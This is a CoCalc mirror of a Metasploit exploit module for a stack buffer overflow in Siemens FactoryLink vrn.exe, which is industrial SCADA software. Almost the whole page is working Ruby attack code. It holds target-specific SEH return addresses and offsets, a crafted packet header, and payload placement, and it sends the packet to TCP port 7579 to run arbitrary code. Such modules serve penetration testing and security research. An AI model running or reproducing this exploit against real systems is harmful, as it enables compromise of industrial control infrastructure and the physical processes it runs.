Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/factorylink_vrn_09.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,

19
          and 8.0.1.703.  By sending a specially crafted packet, an attacker may be able to

20
          execute arbitrary code due to the improper use of a vsprintf() function while

21
          processing the user-supplied text field.  Originally found and posted by

22
          Luigi Auriemma.

23
        },

24
        'Author' => [

25
          'Luigi Auriemma', # Public exploit

26
          'hal',            # Metasploit module

27
          'MC',             # SEH, badchars, etc

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          ['OSVDB', '72815'],

32
          ['URL', 'http://aluigi.altervista.org/adv/factorylink_4-adv.txt'],

33
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']

34
        ],

35
        'Privileged' => true,

36
        'DefaultOptions' => {

37
          'EXITFUNC' => 'seh',

38
        },

39
        'Payload' => {

40
          'Space' => 550,

41
          'BadChars' => "\x00\x20\x0a\x0d",

42
          'StackAdjustment' => -3500,

43
        },

44
        'Platform' => 'win',

45
        'Targets' => [

46
          [ 'FactoryLink 7.5', { 'Ret' => 0x1c0106ac, 'Offset' => 994 } ],

47
          [ 'FactoryLink 7.5 SP2', { 'Ret' => 0x1c01069c, 'Offset' => 994 } ],

48
          [ 'FactoryLink 8.0.1.703', { 'Ret' => 0x1c01087c, 'Offset' => 998 } ],

49
        ],

50
        'DisclosureDate' => '2011-03-21',

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options([Opt::RPORT(7579)])

60
  end

61


62
  def exploit

63
    header = "\x3f" * 4

64
    header << "\xff\x55"

65
    header << "\x09\x00" # opcode

66
    header << "\x3f\x3f\xff\xff"

67
    header << "\x00\x00\x3f\x3f"

68
    header << "\x01\x00"

69
    header << "\x3f" * 16

70
    header << "\x01\x00\x01\x00"

71
    header << "\x3f\x3f"

72


73
    data = rand_text_alpha_upper(65535)

74
    data[448, payload.encoded.length] = payload.encoded

75
    data[target['Offset'], 8] = generate_seh_record(target.ret)

76
    data[1006, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-524").encode_string

77


78
    print_status("Trying target #{target.name}...")

79


80
    connect

81
    sock.put(header + data)

82


83
    handler

84


85
    select(nil, nil, nil, 1)

86
    disconnect

87
  end

88
end

89


90